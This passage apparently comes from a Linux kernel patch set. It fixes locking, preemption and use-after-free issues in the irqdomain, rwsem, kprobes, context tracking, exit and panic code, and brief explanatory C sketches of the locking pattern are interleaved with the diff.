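 * re-initializing fields in place after the object may be visible. */
static struct elem *alloc_elem(void)
{
	return calloc(1, sizeof(struct elem));
}

int main(void)
{
	struct elem *e = alloc_elem();

	printf("lock field starts at %ld\n", e->lock_placeholder);
	free(e);
	return 0;
}
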
+diff --git a/kernel/context_tracking.c b/kernel/context_tracking.c
+index 77978e3723771..a09f1c19336ae 100644
+--- a/kernel/context_tracking.c
++++ b/kernel/context_tracking.c
+@@ -510,7 +510,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 * In this case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 		} else {
+ 			/*
+ 			 * Even if context tracking is disabled on this CPU, because it's outside
+@@ -527,7 +527,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -535,7 +535,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_add(state, &ct->state);
++				arch_atomic_add(state, &ct->state);
+ 			}
+ 		}
+ 	}
+@@ -630,12 +630,12 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 			 * In this case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 
+ 		} else {
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -643,7 +643,7 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_sub(state, &ct->state);
++				arch_atomic_sub(state, &ct->state);
+ 			}
+ 		}
+ 	}
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 15dc2ec80c467..bccfa4218356e 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -807,6 +807,8 @@ void __noreturn do_exit(long code)
+ 	struct task_struct *tsk = current;
+ 	int group_dead;
+ 
++	WARN_ON(irqs_disabled());
++
+ 	synchronize_group_exit(tsk, code);
+ 
+ 	WARN_ON(tsk->plug);
+@@ -938,6 +940,11 @@ void __noreturn make_task_dead(int signr)
+ 	if (unlikely(!tsk->pid))
+ 		panic("Attempted to kill the idle task!");
+ 
++	if (unlikely(irqs_disabled())) {
++		pr_info("note: %s[%d] exited with irqs disabled\n",
++			current->comm, task_pid_nr(current));
++		local_irq_enable();
++	}
+ 	if (unlikely(in_atomic())) {
+ 		pr_info("note: %s[%d] exited with preempt_count %d\n",
+ 			current->comm, task_pid_nr(current),
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index e2096b51c0047..607c0c3d3f5e1 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -25,6 +25,9 @@ static DEFINE_MUTEX(irq_domain_mutex);
+ 
+ static struct irq_domain *irq_default_domain;
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity);
+ static void irq_domain_check_hierarchy(struct irq_domain *domain);
+ 
+ struct irqchip_fwid {
+@@ -123,23 +126,12 @@ void irq_domain_free_fwnode(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(irq_domain_free_fwnode);
+ 
+-/**
+- * __irq_domain_add() - Allocate a new irq_domain data structure
+- * @fwnode: firmware node for the interrupt controller
+- * @size: Size of linear map; 0 for radix mapping only
+- * @hwirq_max: Maximum number of interrupts supported by controller
+- * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
+- *              direct mapping
+- * @ops: domain callbacks
+- * @host_data: Controller private data pointer
+- *
+- * Allocates and initializes an irq_domain structure.
+- * Returns pointer to IRQ domain, or NULL on failure.
+- */
+-struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
+-				    irq_hw_number_t hwirq_max, int direct_max,
+-				    const struct irq_domain_ops *ops,
+-				    void *host_data)
++static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
++					      unsigned int size,
++					      irq_hw_number_t hwirq_max,
++					      int direct_max,
++					      const struct irq_domain_ops *ops,
++					      void *host_data)
+ {
+ 	struct irqchip_fwid *fwid;
+ 	struct irq_domain *domain;
+@@ -227,12 +219,44 @@ struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int s
+ 
+ 	irq_domain_check_hierarchy(domain);
+ 
++	return domain;
++}
++
++static void __irq_domain_publish(struct irq_domain *domain)
++{
+ 	mutex_lock(&irq_domain_mutex);
+ 	debugfs_add_domain_dir(domain);
+ 	list_add(&domain->link, &irq_domain_list);
+ 	mutex_unlock(&irq_domain_mutex);
+ 
+ 	pr_debug("Added domain %s\n", domain->name);
++}
++
++/**
++ * __irq_domain_add() - Allocate a new irq_domain data structure
++ * @fwnode: firmware node for the interrupt controller
++ * @size: Size of linear map; 0 for radix mapping only
++ * @hwirq_max: Maximum number of interrupts supported by controller
++ * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
++ *              direct mapping
++ * @ops: domain callbacks
++ * @host_data: Controller private data pointer
++ *
++ * Allocates and initializes an irq_domain structure.
++ * Returns pointer to IRQ domain, or NULL on failure.
++ */
++struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
++				    irq_hw_number_t hwirq_max, int direct_max,
++				    const struct irq_domain_ops *ops,
++				    void *host_data)
++{
++	struct irq_domain *domain;
++
++	domain = __irq_domain_create(fwnode, size, hwirq_max, direct_max,
++				     ops, host_data);
++	if (domain)
++		__irq_domain_publish(domain);
++
+ 	return domain;
+ }
+ EXPORT_SYMBOL_GPL(__irq_domain_add);
+@@ -538,6 +562,9 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 		return;
+ 
+ 	hwirq = irq_data->hwirq;
++
++	mutex_lock(&irq_domain_mutex);
++
+ 	irq_set_status_flags(irq, IRQ_NOREQUEST);
+ 
+ 	/* remove chip and handler */
+@@ -557,10 +584,12 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 
+ 	/* Clear reverse map for this hwirq */
+ 	irq_domain_clear_mapping(domain, hwirq);
++
++	mutex_unlock(&irq_domain_mutex);
+ }
+ 
+-int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+-			 irq_hw_number_t hwirq)
++static int irq_domain_associate_locked(struct irq_domain *domain, unsigned int virq,
++				       irq_hw_number_t hwirq)
+ {
+ 	struct irq_data *irq_data = irq_get_irq_data(virq);
+ 	int ret;
+@@ -573,7 +602,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 	if (WARN(irq_data->domain, "error: virq%i is already associated", virq))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	irq_data->hwirq = hwirq;
+ 	irq_data->domain = domain;
+ 	if (domain->ops->map) {
+@@ -590,7 +618,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 			}
+ 			irq_data->domain = NULL;
+ 			irq_data->hwirq = 0;
+-			mutex_unlock(&irq_domain_mutex);
+ 			return ret;
+ 		}
+ 
+@@ -601,12 +628,23 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 
+ 	domain->mapcount++;
+ 	irq_domain_set_mapping(domain, hwirq, irq_data);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	irq_clear_status_flags(virq, IRQ_NOREQUEST);
+ 
+ 	return 0;
+ }
++
++int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
++			 irq_hw_number_t hwirq)
++{
++	int ret;
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_associate_locked(domain, virq, hwirq);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(irq_domain_associate);
+ 
+ void irq_domain_associate_many(struct irq_domain *domain, unsigned int irq_base,
+@@ -668,6 +706,34 @@ unsigned int irq_create_direct_mapping(struct irq_domain *domain)
+ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+ #endif
+ 
++static unsigned int irq_create_mapping_affinity_locked(struct irq_domain *domain,
++						       irq_hw_number_t hwirq,
++						       const struct irq_affinity_desc *affinity)
++{
++	struct device_node *of_node = irq_domain_get_of_node(domain);
++	int virq;
++
++	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
++
++	/* Allocate a virtual interrupt number */
++	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
++				      affinity);
++	if (virq <= 0) {
++		pr_debug("-> virq allocation failed\n");
++		return 0;
++	}
++
++	if (irq_domain_associate_locked(domain, virq, hwirq)) {
++		irq_free_desc(virq);
++		return 0;
++	}
++
++	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
++		hwirq, of_node_full_name(of_node), virq);
++
++	return virq;
++}
++
+ /**
+  * irq_create_mapping_affinity() - Map a hardware interrupt into linux irq space
+  * @domain: domain owning this hardware interrupt or NULL for default domain
+@@ -680,14 +746,11 @@ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+  * on the number returned from that call.
+  */
+ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+-				       irq_hw_number_t hwirq,
+-				       const struct irq_affinity_desc *affinity)
++					 irq_hw_number_t hwirq,
++					 const struct irq_affinity_desc *affinity)
+ {
+-	struct device_node *of_node;
+ 	int virq;
+ 
+-	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
+-
+ 	/* Look for default domain if necessary */
+ 	if (domain == NULL)
+ 		domain = irq_default_domain;
+@@ -695,32 +758,19 @@ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+ 		WARN(1, "%s(, %lx) called with NULL domain\n", __func__, hwirq);
+ 		return 0;
+ 	}
+-	pr_debug("-> using domain @%p\n", domain);
+ 
+-	of_node = irq_domain_get_of_node(domain);
++	mutex_lock(&irq_domain_mutex);
+ 
+ 	/* Check if mapping already exists */
+ 	virq = irq_find_mapping(domain, hwirq);
+ 	if (virq) {
+-		pr_debug("-> existing mapping on virq %d\n", virq);
+-		return virq;
+-	}
+-
+-	/* Allocate a virtual interrupt number */
+-	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
+-				      affinity);
+-	if (virq <= 0) {
+-		pr_debug("-> virq allocation failed\n");
+-		return 0;
++		pr_debug("existing mapping on virq %d\n", virq);
++		goto out;
+ 	}
+ 
+-	if (irq_domain_associate(domain, virq, hwirq)) {
+-		irq_free_desc(virq);
+-		return 0;
+-	}
+-
+-	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
+-		hwirq, of_node_full_name(of_node), virq);
++	virq = irq_create_mapping_affinity_locked(domain, hwirq, affinity);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -789,6 +839,8 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 	if (WARN_ON(type & ~IRQ_TYPE_SENSE_MASK))
+ 		type &= IRQ_TYPE_SENSE_MASK;
+ 
++	mutex_lock(&irq_domain_mutex);
++
+ 	/*
+ 	 * If we've already configured this interrupt,
+ 	 * don't do it again, or hell will break loose.
+@@ -801,7 +853,7 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 * interrupt number.
+ 		 */
+ 		if (type == IRQ_TYPE_NONE || type == irq_get_trigger_type(virq))
+-			return virq;
++			goto out;
+ 
+ 		/*
+ 		 * If the trigger type has not been set yet, then set
+@@ -809,40 +861,45 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 */
+ 		if (irq_get_trigger_type(virq) == IRQ_TYPE_NONE) {
+ 			irq_data = irq_get_irq_data(virq);
+-			if (!irq_data)
+-				return 0;
++			if (!irq_data) {
++				virq = 0;
++				goto out;
++			}
+ 
+ 			irqd_set_trigger_type(irq_data, type);
+-			return virq;
++			goto out;
+ 		}
+ 
+ 		pr_warn("type mismatch, failed to map hwirq-%lu for %s!\n",
+ 			hwirq, of_node_full_name(to_of_node(fwspec->fwnode)));
+-		return 0;
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	if (irq_domain_is_hierarchy(domain)) {
+-		virq = irq_domain_alloc_irqs(domain, 1, NUMA_NO_NODE, fwspec);
+-		if (virq <= 0)
+-			return 0;
++		virq = irq_domain_alloc_irqs_locked(domain, -1, 1, NUMA_NO_NODE,
++						    fwspec, false, NULL);
++		if (virq <= 0) {
++			virq = 0;
++			goto out;
++		}
+ 	} else {
+ 		/* Create mapping */
+-		virq = irq_create_mapping(domain, hwirq);
++		virq = irq_create_mapping_affinity_locked(domain, hwirq, NULL);
+ 		if (!virq)
+-			return virq;
++			goto out;
+ 	}
+ 
+ 	irq_data = irq_get_irq_data(virq);
+-	if (!irq_data) {
+-		if (irq_domain_is_hierarchy(domain))
+-			irq_domain_free_irqs(virq, 1);
+-		else
+-			irq_dispose_mapping(virq);
+-		return 0;
++	if (WARN_ON(!irq_data)) {
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	/* Store trigger type */
+ 	irqd_set_trigger_type(irq_data, type);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -1102,12 +1159,15 @@ struct irq_domain *irq_domain_create_hierarchy(struct irq_domain *parent,
+ 	struct irq_domain *domain;
+ 
+ 	if (size)
+-		domain = irq_domain_create_linear(fwnode, size, ops, host_data);
++		domain = __irq_domain_create(fwnode, size, size, 0, ops, host_data);
+ 	else
+-		domain = irq_domain_create_tree(fwnode, ops, host_data);
++		domain = __irq_domain_create(fwnode, 0, ~0, 0, ops, host_data);
++
+ 	if (domain) {
+ 		domain->parent = parent;
+ 		domain->flags |= flags;
++
++		__irq_domain_publish(domain);
+ 	}
+ 
+ 	return domain;
+@@ -1426,40 +1486,12 @@ int irq_domain_alloc_irqs_hierarchy(struct irq_domain *domain,
+ 	return domain->ops->alloc(domain, irq_base, nr_irqs, arg);
+ }
+ 
+-/**
+- * __irq_domain_alloc_irqs - Allocate IRQs from domain
+- * @domain:	domain to allocate from
+- * @irq_base:	allocate specified IRQ number if irq_base >= 0
+- * @nr_irqs:	number of IRQs to allocate
+- * @node:	NUMA node id for memory allocation
+- * @arg:	domain specific argument
+- * @realloc:	IRQ descriptors have already been allocated if true
+- * @affinity:	Optional irq affinity mask for multiqueue devices
+- *
+- * Allocate IRQ numbers and initialized all data structures to support
+- * hierarchy IRQ domains.
+- * Parameter @realloc is mainly to support legacy IRQs.
+- * Returns error code or allocated IRQ number
+- *
+- * The whole process to setup an IRQ has been split into two steps.
+- * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
+- * descriptor and required hardware resources. The second step,
+- * irq_domain_activate_irq(), is to program the hardware with preallocated
+- * resources. In this way, it's easier to rollback when failing to
+- * allocate resources.
+- */
+-int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+-			    unsigned int nr_irqs, int node, void *arg,
+-			    bool realloc, const struct irq_affinity_desc *affinity)
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
+ {
+ 	int i, ret, virq;
+ 
+-	if (domain == NULL) {
+-		domain = irq_default_domain;
+-		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
+-			return -EINVAL;
+-	}
+-
+ 	if (realloc && irq_base >= 0) {
+ 		virq = irq_base;
+ 	} else {
+@@ -1478,24 +1510,18 @@ int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+ 		goto out_free_desc;
+ 	}
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	ret = irq_domain_alloc_irqs_hierarchy(domain, virq, nr_irqs, arg);
+-	if (ret < 0) {
+-		mutex_unlock(&irq_domain_mutex);
++	if (ret < 0)
+ 		goto out_free_irq_data;
+-	}
+ 
+ 	for (i = 0; i < nr_irqs; i++) {
+ 		ret = irq_domain_trim_hierarchy(virq + i);
+-		if (ret) {
+-			mutex_unlock(&irq_domain_mutex);
++		if (ret)
+ 			goto out_free_irq_data;
+-		}
+ 	}
+-	
++
+ 	for (i = 0; i < nr_irqs; i++)
+ 		irq_domain_insert_irq(virq + i);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ 
+@@ -1505,6 +1531,48 @@ out_free_desc:
+ 	irq_free_descs(virq, nr_irqs);
+ 	return ret;
+ }
++
++/**
++ * __irq_domain_alloc_irqs - Allocate IRQs from domain
++ * @domain:	domain to allocate from
++ * @irq_base:	allocate specified IRQ number if irq_base >= 0
++ * @nr_irqs:	number of IRQs to allocate
++ * @node:	NUMA node id for memory allocation
++ * @arg:	domain specific argument
++ * @realloc:	IRQ descriptors have already been allocated if true
++ * @affinity:	Optional irq affinity mask for multiqueue devices
++ *
++ * Allocate IRQ numbers and initialize all data structures to support
++ * hierarchy IRQ domains.
++ * Parameter @realloc is mainly to support legacy IRQs.
++ * Returns error code or allocated IRQ number
++ *
++ * The whole process to setup an IRQ has been split into two steps.
++ * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
++ * descriptor and required hardware resources. The second step,
++ * irq_domain_activate_irq(), is to program the hardware with preallocated
++ * resources. In this way, it's easier to rollback when failing to
++ * allocate resources.
++ */
++int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
++			    unsigned int nr_irqs, int node, void *arg,
++			    bool realloc, const struct irq_affinity_desc *affinity)
++{
++	int ret;
++
++	if (domain == NULL) {
++		domain = irq_default_domain;
++		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
++			return -EINVAL;
++	}
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_alloc_irqs_locked(domain, irq_base, nr_irqs, node, arg,
++					   realloc, affinity);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(__irq_domain_alloc_irqs);
+ 
+ /* The irq_data was moved, fix the revmap to refer to the new location */
+@@ -1865,6 +1933,13 @@ void irq_domain_set_info(struct irq_domain *domain, unsigned int virq,
+ 	irq_set_handler_data(virq, handler_data);
+ }
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
++{
++	return -EINVAL;
++}
++
+ static void irq_domain_check_hierarchy(struct irq_domain *domain)
+ {
+ }
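
The irqdomain rework above funnels every path through *_locked helpers and takes irq_domain_mutex once at the public entry points. A compact sketch of that locked-helper/public-wrapper split (the pthread mutex and alloc_irqs* names are illustrative):

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t domain_lock = PTHREAD_MUTEX_INITIALIZER;
static int next_virq = 1;

/* Internal helper: caller must already hold domain_lock. */
static int alloc_irqs_locked(int count)
{
	int base = next_virq;

	next_virq += count;
	return base;
}

/* Public entry point takes the lock once around the whole operation,
 * the shape the hunks above give __irq_domain_alloc_irqs(). */
static int alloc_irqs(int count)
{
	int base;

	pthread_mutex_lock(&domain_lock);
	base = alloc_irqs_locked(count);
	pthread_mutex_unlock(&domain_lock);
	return base;
}

int main(void)
{
	printf("allocated virqs starting at %d\n", alloc_irqs(4));
	return 0;
}
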
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 1c18ecf9f98b1..00e177de91ccd 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -458,7 +458,7 @@ static inline int kprobe_optready(struct kprobe *p)
+ }
+ 
+ /* Return true if the kprobe is disarmed. Note: p must be on hash list */
+-static inline bool kprobe_disarmed(struct kprobe *p)
++bool kprobe_disarmed(struct kprobe *p)
+ {
+ 	struct optimized_kprobe *op;
+ 
+@@ -555,17 +555,15 @@ static void do_unoptimize_kprobes(void)
+ 	/* See comment in do_optimize_kprobes() */
+ 	lockdep_assert_cpus_held();
+ 
+-	/* Unoptimization must be done anytime */
+-	if (list_empty(&unoptimizing_list))
+-		return;
++	if (!list_empty(&unoptimizing_list))
++		arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+ 
+-	arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+-	/* Loop on 'freeing_list' for disarming */
++	/* Loop on 'freeing_list' for disarming and removing from kprobe hash list */
+ 	list_for_each_entry_safe(op, tmp, &freeing_list, list) {
+ 		/* Switching from detour code to origin */
+ 		op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+-		/* Disarm probes if marked disabled */
+-		if (kprobe_disabled(&op->kp))
++		/* Disarm probes if marked disabled and not gone */
++		if (kprobe_disabled(&op->kp) && !kprobe_gone(&op->kp))
+ 			arch_disarm_kprobe(&op->kp);
+ 		if (kprobe_unused(&op->kp)) {
+ 			/*
+@@ -662,7 +660,7 @@ void wait_for_kprobe_optimizer(void)
+ 	mutex_unlock(&kprobe_mutex);
+ }
+ 
+-static bool optprobe_queued_unopt(struct optimized_kprobe *op)
++bool optprobe_queued_unopt(struct optimized_kprobe *op)
+ {
+ 	struct optimized_kprobe *_op;
+ 
+@@ -797,14 +795,13 @@ static void kill_optimized_kprobe(struct kprobe *p)
+ 	op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+ 
+ 	if (kprobe_unused(p)) {
+-		/* Enqueue if it is unused */
+-		list_add(&op->list, &freeing_list);
+ 		/*
+-		 * Remove unused probes from the hash list. After waiting
+-		 * for synchronization, this probe is reclaimed.
+-		 * (reclaiming is done by do_free_cleaned_kprobes().)
++		 * Unused kprobe is on unoptimizing or freeing list. We move it
++		 * to freeing_list and let the kprobe_optimizer() remove it from
++		 * the kprobe hash list and free it.
+ 		 */
+-		hlist_del_rcu(&op->kp.hlist);
++		if (optprobe_queued_unopt(op))
++			list_move(&op->list, &freeing_list);
+ 	}
+ 
+ 	/* Don't touch the code, because it is already freed. */
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index e3375bc40dadc..50d4863974e7a 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -55,6 +55,7 @@
+ #include <linux/rcupdate.h>
+ #include <linux/kprobes.h>
+ #include <linux/lockdep.h>
++#include <linux/context_tracking.h>
+ 
+ #include <asm/sections.h>
+ 
+@@ -6555,6 +6556,7 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ {
+ 	struct task_struct *curr = current;
+ 	int dl = READ_ONCE(debug_locks);
++	bool rcu = warn_rcu_enter();
+ 
+ 	/* Note: the following can be executed concurrently, so be careful. */
+ 	pr_warn("\n");
+@@ -6595,5 +6597,6 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ 	lockdep_print_held_locks(curr);
+ 	pr_warn("\nstack backtrace:\n");
+ 	dump_stack();
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL_GPL(lockdep_rcu_suspicious);
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 44873594de031..84d5b649b95fe 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -624,18 +624,16 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 			 */
+ 			if (first->handoff_set && (waiter != first))
+ 				return false;
+-
+-			/*
+-			 * First waiter can inherit a previously set handoff
+-			 * bit and spin on rwsem if lock acquisition fails.
+-			 */
+-			if (waiter == first)
+-				waiter->handoff_set = true;
+ 		}
+ 
+ 		new = count;
+ 
+ 		if (count & RWSEM_LOCK_MASK) {
++			/*
++			 * A waiter (first or not) can set the handoff bit
++			 * if it is an RT task or has waited in the wait
++			 * queue for too long.
++			 */
+ 			if (has_handoff || (!rt_task(waiter->task) &&
+ 					    !time_after(jiffies, waiter->timeout)))
+ 				return false;
+@@ -651,11 +649,12 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 	} while (!atomic_long_try_cmpxchg_acquire(&sem->count, &count, new));
+ 
+ 	/*
+-	 * We have either acquired the lock with handoff bit cleared or
+-	 * set the handoff bit.
++	 * We have either acquired the lock with handoff bit cleared or set
++	 * the handoff bit. Only the first waiter can have its handoff_set
++	 * set here to enable optimistic spinning in slowpath loop.
+ 	 */
+ 	if (new & RWSEM_FLAG_HANDOFF) {
+-		waiter->handoff_set = true;
++		first->handoff_set = true;
+ 		lockevent_inc(rwsem_wlock_handoff);
+ 		return false;
+ 	}
+@@ -1092,7 +1091,7 @@ queue:
+ 			/* Ordered by sem->wait_lock against rwsem_mark_wake(). */
+ 			break;
+ 		}
+-		schedule();
++		schedule_preempt_disabled();
+ 		lockevent_inc(rwsem_sleep_reader);
+ 	}
+ 
+@@ -1254,14 +1253,20 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+  */
+ static inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
++	int ret = 0;
+ 	long count;
+ 
++	preempt_disable();
+ 	if (!rwsem_read_trylock(sem, &count)) {
+-		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state)))
+-			return -EINTR;
++		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state))) {
++			ret = -EINTR;
++			goto out;
++		}
+ 		DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 	}
+-	return 0;
++out:
++	preempt_enable();
++	return ret;
+ }
+ 
+ static inline void __down_read(struct rw_semaphore *sem)
+@@ -1281,19 +1286,23 @@ static inline int __down_read_killable(struct rw_semaphore *sem)
+ 
+ static inline int __down_read_trylock(struct rw_semaphore *sem)
+ {
++	int ret = 0;
+ 	long tmp;
+ 
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 
++	preempt_disable();
+ 	tmp = atomic_long_read(&sem->count);
+ 	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
+ 		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
+ 						    tmp + RWSEM_READER_BIAS)) {
+ 			rwsem_set_reader_owned(sem);
+-			return 1;
++			ret = 1;
++			break;
+ 		}
+ 	}
+-	return 0;
++	preempt_enable();
++	return ret;
+ }
+ 
+ /*
+@@ -1335,6 +1344,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 	DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 
++	preempt_disable();
+ 	rwsem_clear_reader_owned(sem);
+ 	tmp = atomic_long_add_return_release(-RWSEM_READER_BIAS, &sem->count);
+ 	DEBUG_RWSEMS_WARN_ON(tmp < 0, sem);
+@@ -1343,6 +1353,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 		clear_nonspinnable(sem);
+ 		rwsem_wake(sem);
+ 	}
++	preempt_enable();
+ }
+ 
+ /*
+@@ -1662,6 +1673,12 @@ void down_read_non_owner(struct rw_semaphore *sem)
+ {
+ 	might_sleep();
+ 	__down_read(sem);
++	/*
++	 * The owner value for a reader-owned lock is mostly for debugging
++	 * purposes only and is not critical to the correct functioning of
++	 * rwsem. So it is perfectly fine to set it in a preempt-enabled
++	 * context here.
++	 */
+ 	__rwsem_set_reader_owned(sem, NULL);
+ }
+ EXPORT_SYMBOL(down_read_non_owner);
+diff --git a/kernel/panic.c b/kernel/panic.c
+index 7834c9854e026..ca5452afb456d 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -33,6 +33,7 @@
+ #include <linux/ratelimit.h>
+ #include <linux/debugfs.h>
+ #include <linux/sysfs.h>
++#include <linux/context_tracking.h>
+ #include <trace/events/error_report.h>
+ #include <asm/sections.h>
+ 
+@@ -210,9 +211,6 @@ static void panic_print_sys_info(bool console_flush)
+ 		return;
+ 	}
+ 
+-	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
+-		trigger_all_cpu_backtrace();
+-
+ 	if (panic_print & PANIC_PRINT_TASK_INFO)
+ 		show_state();
+ 
+@@ -242,6 +240,30 @@ void check_panic_on_warn(const char *origin)
+ 		      origin, limit);
+ }
+ 
++/*
++ * Helper that triggers the NMI backtrace (if set in panic_print)
++ * and then shuts down the secondary CPUs - we cannot have
++ * the NMI backtrace after the CPUs are off!
++ */
++static void panic_other_cpus_shutdown(bool crash_kexec)
++{
++	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
++		trigger_all_cpu_backtrace();
++
++	/*
++	 * Note that smp_send_stop() is the usual SMP shutdown function,
++	 * which unfortunately may not be hardened to work in a panic
++	 * situation. If we want to do a crash dump after notifier calls
++	 * and kmsg_dump, we will need architecture-dependent extra
++	 * bits in addition to stopping other CPUs, hence we rely on
++	 * crash_smp_send_stop() for that.
++	 */
++	if (!crash_kexec)
++		smp_send_stop();
++	else
++		crash_smp_send_stop();
++}
++
+ /**
+  *	panic - halt the system
